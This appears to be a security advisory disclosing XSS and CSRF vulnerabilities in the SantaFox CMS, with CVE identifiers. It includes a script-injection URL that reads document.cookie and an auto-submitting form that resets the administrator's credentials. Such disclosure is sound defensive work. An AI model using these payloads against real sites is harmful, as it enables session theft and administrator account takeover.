High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SantaFox which could be exploited to perform cross-site scripting and cross-site request forgery attacks.
Cross-site scripting (XSS) vulnerability in SantaFox: CVE-2010-3463
The vulnerability exists due to input sanitation error in the “search” parameter in modules/search/search.class.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is authorized. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://host/search.html?search=1"><script>alert(document.cookie)</script>&x= 0&y=0
Cross-site request forgery (CSRF) in SantaFox: CVE-2010-3464
The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
Exploitation example:
<form action=“http://host/admin/index.php?action=set_left_menu&leftmenu=save_admin &id=-1” method=“post” name=“main” >
<input type=“hidden” name=“login” value=“Admin” />
<input type=“hidden” name=“full_name” value=“Admin” />
<input type=“hidden” name=“pass” value=“Admin” />
<input type=“hidden” name=“lang” value=“en” />
<input type=“hidden” name=“codepage” value=“” />
<input type=“hidden” name=“enabled” value=“on” />
<input type=“hidden” name=“select_group[1]” value=“on” />
<input type=“hidden” name=“select_group[2]” value=“on” />
</form>
<script>
document.main.submit();
</script>